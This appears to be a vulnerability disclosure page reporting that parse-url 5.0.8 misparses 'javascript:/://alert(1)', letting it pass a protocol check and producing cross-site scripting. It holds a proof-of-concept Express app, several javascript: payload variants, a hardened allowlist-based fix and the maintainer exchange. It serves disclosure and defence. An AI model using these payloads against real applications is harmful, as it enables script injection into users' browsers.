Cross Site Scripting via Improper Input Validation in ionicabizau/parse-url
Valid
Reported on Jun 11th 2022
Description
parse-url version 5.0.8 does not validate the :// separator when it extracts the protocol from a URL. For the input javascript:/://alert(1) it reports protocol 'javascript:/' instead of 'javascript', so an application check that compares the parsed protocol against "javascript" is bypassed, while the browser still treats the resulting href as a javascript: URL. The same input is parsed correctly (protocol 'javascript:') by url-parse, the WHATWG new URL() and Node's url.parse(); only parse-url is affected.
Proof of Concept
const parseUrl = require("parse-url");
const express = require("express");
const app = express();

// Attacker-controlled URL. parse-url 5.0.8 reports its protocol as
// "javascript:/" rather than "javascript".
const parsed = parseUrl("javascript:/://alert(1)");
console.log(parsed);

app.get("/", (req, res) => {
  // Intended to refuse javascript: links, but the spoofed protocol
  // value does not equal "javascript", so the link is rendered.
  if (parsed.protocol !== "javascript") {
    res.send("<a href='" + parsed.href + "'>CLICK ME!</a>");
  }
});

app.listen(9999);
The Express handler above is meant to refuse javascript: links by comparing parsed.protocol with "javascript". Because parse-url reports the protocol of this input as 'javascript:/', the comparison passes and the href is written into the page unchanged.
Output of console.log(parsed):
{
protocols: [ 'javascript:/' ],
protocol: 'javascript:/',
port: null,
resource: 'alert(1)',
user: '',
pathname: '',
hash: '',
search: '',
href: 'javascript:/://alert(1)',
query: [Object: null prototype] {}
}
Rendered document in the browser:
<a href="javascript:/://alert(1)">CLICK ME!</a>
Behaviour of other URL parsers
❯ node -e "const parser = require('url-parse');console.log(parser('javascript:/://alert()'))"
{
slashes: false,
protocol: 'javascript:',
hash: '',
query: '',
pathname: '/://alert()',
auth: '',
host: '',
port: '',
hostname: '',
password: '',
username: '',
origin: 'null',
href: 'javascript:/://alert()'
}
❯ node -e 'console.log(new URL("javascript:/://alert()"))'
URL {
href: 'javascript:/://alert()',
origin: 'null',
protocol: 'javascript:',
username: '',
password: '',
host: '',
hostname: '',
port: '',
pathname: '/://alert()',
search: '',
searchParams: URLSearchParams {},
hash: ''
}
Both of these widely used parsers normalise the scheme of the same input to 'javascript:', so a protocol check built on either of them is not bypassed and no XSS results.
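The following is an added example written for this page; it is not code from the original report or from parse-url. It puts the weak check the PoC relies on next to a hardened version that canonicalises the URL with the same WHATWG parser shown above (new URL()) and then allowlists the scheme, so the bypass payload and its common variants are all rejected. The function names (weakProtocol, weakCheckAllows, safeHref, renderLink), the allowlist and the base origin https://example.invalid/ are this example's own assumptions, and the weak-parser model only reproduces the behaviour visible in the printed parse-url output, not parse-url's source.

```javascript
// Added example, not parse-url's code and not the original PoC.
// Contrasts a scheme check that trusts a loose parser with one that
// canonicalises through the WHATWG URL parser and allowlists schemes.

// Assumed allowlist and base origin for resolving relative links.
const ALLOWED_SCHEMES = new Set(["http:", "https:", "mailto:"]);
const BASE = "https://example.invalid/";

// Model of the weak behaviour seen in the report output (protocol
// 'javascript:/'): whatever precedes the first "://" is taken as the
// protocol without checking that it is a bare scheme. This mirrors the
// printed output only; it is not taken from parse-url's source.
function weakProtocol(input) {
  const i = input.indexOf("://");
  return i === -1 ? "" : input.slice(0, i);
}

// The PoC's check: allow anything whose protocol is not exactly "javascript".
function weakCheckAllows(input) {
  return weakProtocol(input) !== "javascript";
}

// Hardened check: the WHATWG parser lowercases the scheme, strips ASCII
// tab/newline, and reports "javascript:" for "javascript:/://...". Only
// allowlisted schemes pass; unparseable input is rejected, not passed through.
function safeHref(input, base = BASE) {
  let url;
  try {
    url = new URL(String(input), base);
  } catch {
    return null;
  }
  return ALLOWED_SCHEMES.has(url.protocol) ? url.href : null;
}

// Escape for an HTML attribute value. Needed even for allowed URLs, since
// the PoC concatenates href straight into markup.
function escapeAttr(s) {
  return s
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// What the Express handler should emit: a link only for a vetted href.
function renderLink(input) {
  const href = safeHref(input);
  if (href === null) return "<span>(link removed)</span>";
  return `<a href="${escapeAttr(href)}">CLICK ME!</a>`;
}

// Constructed sample inputs: the reported payload plus common variants.
const SAMPLES = [
  "javascript:/://alert(1)",      // the reported bypass
  "JavaScript:alert(1)",          // case variant
  "java\tscript:alert(1)",        // embedded tab, stripped by browsers
  "https://example.com/?a=1&b=2", // legitimate absolute link
  "/relative/path",               // legitimate relative link
];

if (typeof require !== "undefined" && require.main === module) {
  for (const s of SAMPLES) {
    console.log(JSON.stringify(s),
      "weak allows:", weakCheckAllows(s),
      "rendered:", renderLink(s));
  }
}
```

The design point is that the scheme decision and the rendering both use the canonical form produced by one parser, so the string the browser interprets is the string that was checked; a check made against a different parser's view of the URL is exactly the gap this report exploits.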
Impact
An application that relies on parse-url's protocol field to filter out javascript: URLs before placing them in an href can be made to render a link that executes attacker-supplied script in the victim's browser when clicked (cross-site scripting).
We are processing your report and will contact the ionicabizau/parse-url team within 24 hours.
2 months ago
We have contacted a member of the ionicabizau/parse-url team and are waiting to hear back.
2 months ago
We have sent a follow up to the ionicabizau/parse-url team. We will try again in 7 days.
2 months ago
We have sent a second follow up to the ionicabizau/parse-url team. We will try again in 10 days.
a month ago
Hi there! Sorry for the late reply and thank you for this report. I am working on fixing this.
Ionică Bizău (Johnny B.) has been awarded the fix bounty.